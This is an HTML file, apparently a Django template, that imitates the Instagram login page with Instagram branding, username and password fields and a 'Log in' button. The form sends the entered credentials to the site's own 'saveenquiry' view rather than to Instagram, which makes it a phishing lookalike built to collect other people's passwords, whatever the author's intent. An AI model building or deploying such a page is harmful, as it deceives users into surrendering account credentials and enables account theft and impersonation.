<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Latest compiled and minified CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- Latest compiled JavaScript -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Cedarville+Cursive&display=swap" rel="stylesheet">
    <title>Document</title>

    <style>
        .header {
            background-color: black;
            height: 65px;
            border-radius: 25px;
        }

        .header,
        a {
            text-decoration: none;
            color: white;
            padding: 10px;
            text-align: center;
            padding-top: 22px;
        }

        .nav h1 {
            color: red;
        }


        .insta {
            border: 1px solid black;
            width: 380px;
            height: 500px;
            text-align: center;
            margin-left: 550px;
            margin-top: 55px;
            border-radius: 25px;
            margin-top: 100PX;
        }

        .insta h1 {
            font-family: cursive;
            font-weight: 400;
            font-style: normal;
            font-size: 44px;
            margin-top: 50px;
        }

        .insta input {
            width: 300px;
        }

        .part1 {
            padding-top: 40px;
        }

        .part2 {
            margin-top: 10px;
        }

        .part3 button {
            width: 350px;
            margin-top: 10px;
        }
    </style>
</head>

<body>

    <!-- <div class="header">
        <a href="{% url 'home'  %}">Home</a>
        <a href="{% url 'about'  %}">About</a>
        <a href="{% url 'blog'  %}">Blog</a>
        <a href="{% url 'contact'  %}">Contact</a>
    </div> -->


    <!-- <div class="nav">
        <h1>Welcome to my Contact Page</h1>
    </div> -->
    <!-- {% csrf_token %} -->
    <div class="insta">

        <form action="{% url 'saveenquiry' %}" method="post">
            {% csrf_token %}

            <h1>Instagram</h1>

            <div class="part1">
                <input style="padding: 7px;" type="email number" placeholder="Phone number, username, or email"
                    name="name"> <br>
            </div>

            <div class="part2">
                <input style="padding: 7px;" style="margin-top: 8px;" type="password" placeholder="Password"
                    name="password"> <br>
            </div>

            <div style="margin-top: 10px;" class="part3" id="">
                <input style="border-radius: 10px;" type="submit" class="btn btn-primary" value="Log in"> <br>
            </div>

            <div class="part4">
                <p style="font-size: 22px; margin-top: 20px;">---------- OR ----------</p>
            </div>


            <div style="margin-top: 25px;" class="part5">
                <a href="" style="color: black;">
                    <i style="font-size: 20px;" class="fa-brands fa-square-facebook"></i> Login in with facebook</a>
                <br>
            </div>

            <div style="margin-top: 20px;" class="part6">
                <a href="" style="color: black;">Forget password?</a>
            </div>

        </form>
    </div>

</body>

</html>